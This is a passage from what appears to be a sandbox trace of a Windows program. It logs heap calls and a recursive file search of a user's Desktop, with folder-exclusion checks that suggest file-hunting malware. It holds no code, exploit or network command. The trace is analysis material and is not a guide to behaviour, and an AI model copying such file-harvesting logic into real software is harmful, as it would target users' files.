Size=0x20) returned 0x68ddd8 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.424] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x3db91a60, ftLastWriteTime.dwHighDateTime=0x1d5dcda, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x10, dwReserved1=0x657690, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 1 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.424] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf91c4650, ftCreationTime.dwHighDateTime=0x1d5ddd5, ftLastAccessTime.dwLowDateTime=0x80d0ad70, ftLastAccessTime.dwHighDateTime=0x1d5dde0, ftLastWriteTime.dwLowDateTime=0x80d0ad70, ftLastWriteTime.dwHighDateTime=0x1d5dde0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="LtZ4mBBPXnfPFiN1jbH3", cAlternateFileName="LTZ4MB~1")) returned 1 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.424] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LtZ4mBBPXnfPFiN1jbH3", cchCount1=20, lpString2="AppData", cchCount2=7) returned 3 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0073.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b810 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.426] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c00 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bc0 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bd0 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9970 [0073.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bd0 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bb0 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690ba0 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c50 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ad0 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c60 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b2e8 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b468 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ad0 [0073.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0073.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b468 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c60 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b480 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b420 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b438 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b450 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0073.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b450 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0073.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b450 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b390 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3a8 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3c0 [0073.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3d8 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3f0 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b408 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ca0 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cb0 [0073.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b99f8 [0073.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0073.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf91c4650, ftCreationTime.dwHighDateTime=0x1d5ddd5, ftLastAccessTime.dwLowDateTime=0x80d0ad70, ftLastAccessTime.dwHighDateTime=0x1d5dde0, ftLastWriteTime.dwLowDateTime=0x80d0ad70, ftLastWriteTime.dwHighDateTime=0x1d5dde0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0073.429] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf91c4650, ftCreationTime.dwHighDateTime=0x1d5ddd5, ftLastAccessTime.dwLowDateTime=0x80d0ad70, ftLastAccessTime.dwHighDateTime=0x1d5dde0, ftLastWriteTime.dwLowDateTime=0x80d0ad70, ftLastWriteTime.dwHighDateTime=0x1d5dde0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0073.430] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0xcfa2aa80, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 1 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ca0 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b99f8 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.430] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cb0 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.430] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0073.430] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cb0 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cb0 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.431] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.431] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0073.431] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb0) returned 0x6b99f8 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x696d08 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cd0 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0073.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ce0 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696d08 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b99f8 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.432] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0073.433] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0073.433] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.433] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.433] 